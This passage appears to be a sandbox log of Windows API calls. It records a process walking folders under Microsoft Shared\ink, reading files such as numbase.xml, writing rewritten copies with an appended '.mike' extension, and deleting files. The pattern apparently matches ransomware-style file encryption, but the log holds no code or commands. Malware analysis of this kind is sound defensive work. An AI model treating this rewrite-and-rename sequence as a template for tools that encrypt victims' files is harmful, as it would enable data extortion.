lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.102] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.102] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.102] GetFileType (hFile=0x264) returned 0x1 [0046.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.102] GetFileType (hFile=0x264) returned 0x1 [0046.102] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.102] WriteFile (in: hFile=0x264, lpBuffer=0x227bddc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x227bddc*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.103] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x227b894 | out: lpFileInformation=0x227b894*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2)) returned 1 [0046.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.104] GetFileType (hFile=0x264) returned 0x1 [0046.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.104] GetFileType (hFile=0x264) returned 0x1 [0046.104] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.104] ReadFile (in: hFile=0x264, lpBuffer=0x227cf20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x227cf20*, lpNumberOfBytesRead=0x2af038*=0x4c2, lpOverlapped=0x0) returned 1 [0046.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.106] GetFileType (hFile=0x264) returned 0x1 [0046.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.106] GetFileType (hFile=0x264) returned 0x1 [0046.106] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.106] WriteFile (in: hFile=0x264, lpBuffer=0x2281aac*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2281aac*, lpNumberOfBytesWritten=0x2af02c*=0x4d0, lpOverlapped=0x0) returned 1 [0046.106] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.106] GetFileType (hFile=0x264) returned 0x1 [0046.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.106] GetFileType (hFile=0x264) returned 0x1 [0046.107] WriteFile (in: hFile=0x264, lpBuffer=0x2284cf0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2284cf0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5af9f20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5af9f20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5af9f20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0)) returned 1 [0046.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x228653c | out: lpFileInformation=0x228653c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5af9f20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5af9f20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5af9f20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0)) returned 1 [0046.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", dwFileAttributes=0x80) returned 0 [0046.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.110] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5af9f20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5af9f20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5af9f20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0)) returned 1 [0046.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.110] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike")) returned 1 [0046.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.112] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpFilePart=0x0) returned 0x48 [0046.112] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\", lpFilePart=0x0) returned 0x49 [0046.112] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5af9f20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5af9f20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.112] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5af9f20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5af9f20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.112] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0046.112] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbase.xml", cAlternateFileName="")) returned 0 [0046.112] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpFilePart=0x0) returned 0x48 [0046.113] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.113] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.113] CoTaskMemFree (pv=0x4fe370) [0046.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpFilePart=0x0) returned 0x48 [0046.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpFilePart=0x0) returned 0x48 [0046.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\", lpFilePart=0x0) returned 0x49 [0046.113] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.147] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.148] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0046.148] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.148] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.188] GetFileType (hFile=0x264) returned 0x1 [0046.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.188] GetFileType (hFile=0x264) returned 0x1 [0046.188] CloseHandle (hObject=0x264) returned 1 [0046.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.188] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.188] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), fInfoLevelId=0x0, lpFileInformation=0x228aecc | out: lpFileInformation=0x228aecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7)) returned 1 [0046.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 